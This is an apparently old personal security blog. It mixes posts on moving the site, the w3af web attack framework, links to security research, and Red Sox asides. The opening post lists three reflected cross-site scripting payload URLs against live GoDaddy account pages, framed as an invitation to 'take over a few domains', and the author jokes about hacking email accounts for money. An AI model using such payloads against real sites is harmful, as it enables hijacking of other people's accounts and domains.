Anyone want to take over a few domains?
https://dcc.godaddy.com/DccError.aspx?sa=%22+onerror%3d%27alert(1)%27+%22 https://dcc.godaddy.com/default.aspx?activeview=transfer&filtertype=3&sa=%22+onerror%3d%27alert(1)%27+%22 https://mya.godaddy.com/myaError.aspx?sa=%27%20onerror=%27alert(1)
It’s scary how full of holes godaddy.com is, this is just a sample of what I saw while I was transferring my domains to webfaction.
I redesigned, well picked a new theme, and moved the site to a new hosting company today. I have been severily neglecting hiredhacker.com, but life has been filling my time up with ‘real’ things.
I will try and post things from time to time, I just really hate writing. I don’t mind giving technical information or blurts about vulnerabilities, I just really hate all the filler talk bull shit. So from this point forward, I am just going to put up little snippets of things. They should be obvious what they are but if not leave a comment and I will try and get to it when I can.
One more thing, PLEASE PLEASE PLEASE stop asking me to hack into someones AOL account, hotmail account or anything else for that matter! Yes I CAN do it, but I am not going to… unless you have really deep pockets ;)
-g
w3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.
w3af is a great (and getting better) framework that I just decided to start contributing to. I want to get as much attention to these guys as possible as it has allot of potential to be a very impressive tool.
Hopefully I can set some time aside to actually start throwing some code at em and if you know python and have an interest in web application security, lend a hand! Its a great group of guys (and girls?) working on an exciting tool.
A little off topic but if you are a fan of the Sox, or just like baseball you gotta see this. Here is Manny’s sprinting-wall-climbing-high-fiveing-double-play-catch from a few nights ago:
http://www.mlb.com/media/video_sl.jsp?video=200805142699480
The past few months haven’t exactly been slow for me, hence the lack of new content here. There have been allot of interesting stuff to happen over the past 2 months, I will try to point out the ones I found most interesting. In no particular order (well, except for Mark Dowd’s inhuman paper, that needs to go first):
Application-Specific Attacks: Leveraging the ActionScript Virtual Machine, Thomas Ptacek from Matasano has some nice posts about Dowds paper here and here. Come to think of it, just read the Matasano Blog.
Retsaot is Toaster, Reversed: Quick ‘n Dirty Firmware Reversing. Yea, another matasano post. Once you read that your going to want to get this: BlackBag 0.9.1
For those who still doubt the seriousness of bugs like XSS and CSRF, check out: uTorrent Pwn3d. With out rehashing Rob’s post, he used CSRF to gain control of a machine.
The Bluehat talk A Resident in My Domain has sparked quite a few posts about the details of the attack, and it looks very interesting/serious.
There is of course always OpenRCE.org and sla.ckers.org, and if your in the Boston area or are just fans of Dropkick they will be playing at all the Red Sox minor league parks with the Bosstones, more info here.
